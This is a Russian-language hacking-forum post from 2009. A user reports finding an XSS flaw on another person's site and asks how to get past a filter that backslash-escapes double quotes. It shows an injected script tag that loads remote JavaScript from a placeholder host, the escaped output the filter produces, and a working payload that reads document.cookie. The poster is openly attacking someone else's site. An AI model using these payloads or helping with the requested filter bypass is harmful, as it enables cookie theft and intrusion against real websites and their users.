23.11.2009, 22:40
|
|
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами:
8677074
Репутация:
15
|
|
Ситуация в том что я нашел xss но при попытке засунуть ей вот этот скрипт
PHP код:
<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>
Нечего не происходит так как у него фильтр на " и %22 его аналог фильтр заключается в том что перед ним он ставит знак \ а именно
PHP код:
<SCRIPT type=\"text/javascript\" src=\"http://your_site.com/js.js\"></SCRIPT>
Его можно как нибудь обойти или это все?
просто когда пишешь
PHP код:
<script>alert(document.cookie)</script>
Все показывает. |
|
|